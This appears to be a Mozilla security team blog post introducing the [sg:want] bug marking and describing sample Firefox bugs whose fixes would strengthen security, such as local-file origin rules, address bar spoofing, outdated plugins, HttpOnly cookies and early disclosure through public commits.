The Mozilla security group uses status whiteboard markings in bugs to indicate how severe a security hole is. For example, bugs that allow a malicious site to take over users' computers easily are labeled [sg:critical]. The severities we use (critical, high, moderate, and low) are described on the known vulnerabilities page.
Recently, Dan Veditz and I started using a new status whiteboard marking, [sg:want], to indicate that a fix would improve security even though we don't consider the bug to be a security hole. On many bugs, we use [sg:want P1] through [sg:want P5] to indicate roughly how much a fix would improve security. Currently, only one bug has P1, and eight bugs are P2. These bugs include user-interface changes, code-level changes, and entire new features.
If you think a bug should have [sg:want], you should contact me or dveditz rather than adding it yourself.
Here's a sampling of [sg:want] bugs, along with a few long-standing bugs that we do consider to be security holes:
Tighten the same-origin policy for local files.
The same-origin policy protects web site scripts from accessing private information on other web sites or on your hard drive. But an HTML file on your hard drive is allowed to read pretty much any text, HTML, or XML file on your computer. Combined with a widespread perception that HTML files are safe to double-click on (like MP3 files and unlike EXE files), this leads to several attack scenarios.
Microsoft's "solution" to this problem, introduced with Windows XP SP2, is kind of insane. Internet Explorer disable all scripts in local files, unless you click an information bar and then click "Yes" in a dialog. This breaks way too many pages, and anyone who clicks "Yes" in order to unbreak pages grants the page access to their entire filesystem.
Some types of mixed content don't trigger the "broken lock icon"
The broken lock icon is a way to alert https web site owners that they are using http content in a way that makes their sites less secure. But many things that should trigger a broken lock icon don't trigger it, so web site owners testing with Firefox aren't alerted.
Always show the address bar.
Allowing sites to hide the address bar in pop-up windows makes it possible for sites to spoof the address bar, making it appear that you're on a different site. I think Microsoft recently made Internet Explorer always show the address bar; we should too.
Countermeasures for Java/plugin/extension vulnerabilities (disable, warn).
Every few months we hear a report of somone getting infected with spyware while using Firefox. It usually turns out that the user had an old version of Java, and a malicious web site exploited an old Java hole. Refusing to load old versions of Java would help a lot. (Fixing this is tricky, because each plugin presents version information in a different way, and some plugins hide version information from Firefox entirely.)
Crashes on startup with XP SP2 and a processor that supports NX aka Data Execution Protection.
In addition to the obvious problem of preventing some people from using Firefox, this forces users to run Firefox without Data Execution Prevention, and may encourage some users to turn off DEP for all programs. DEP is a cheap measure that makes memory safety bugs harder to exploit to run arbitrary code.
Firefox should check for updates even if it doesn't have write access to itself.
Making users choose between using non-root accounts and having update notifications isn't too hot.
Safer handling of executable files with download manager.
Using "Save Link As..." followed by double-clicking the file in explorer doesn't give you any warning if the file happens to be an executable file. Unless you check the extension of every porn video you download before double-clicking it, you could get owned easily.
Explicit local root model has bad human factors.
Firefox used to have a lot of bugs called GC hazards, where newly created JavaScript engine objects would be garbage-collected prematurely, leading to dangling pointer situations. Through a combination of code auditing (mostly by Igor Bukanov) and testing with the WAY_TOO_MUCH_GC option, we've eliminated quite a few of them. But it's still too easy to make mistakes that lead to GC hazards, and there are some ideas for fixing that.
Fix all non-origin URL load processing to track origin principals.
Firefox has had quite a few vulnerabilities involving the javascript: and data: protocols, as used from chrome. This bug contains discussion about design changes that could eliminate this class of bugs with API changes.
HttpOnly cookie attribute for cross-site scripting vulnerability prevention.
IE supports a HttpOnly attribute for cookies. When servers use this attribute, cross-site scripting (XSS) security holes in web sites cannot be to steal their cookies. This makes useful attacks significantly harder to pull off, and in some cases involving subdomains, prevents useful attacks entirely.
Consider a policy for security bugs such that people scanning bonsai/cvs commit history can't immediately detect security bugs and work to build exploits.
As soon as we have a reviewed patch for a security hole, we check the fix into a public CVS repository, even if the bug report is to remain private until a fixed version is released. For many bugs, someone looking at the patch and checkin comment could figure out how to exploit the bug. He might then be able to exploit it quietly for weeks before a new version of Firefox is released, or exploit it widely and force a security firedrill.
It's not clear how to solve this problem. Keeping security fixes out of CVS and off of the trunk would severely limit the number of people who can test the fixes. This would cause regressions to be identified later, possibly delaying the release. Or worse, regressions might only be noticed after the release.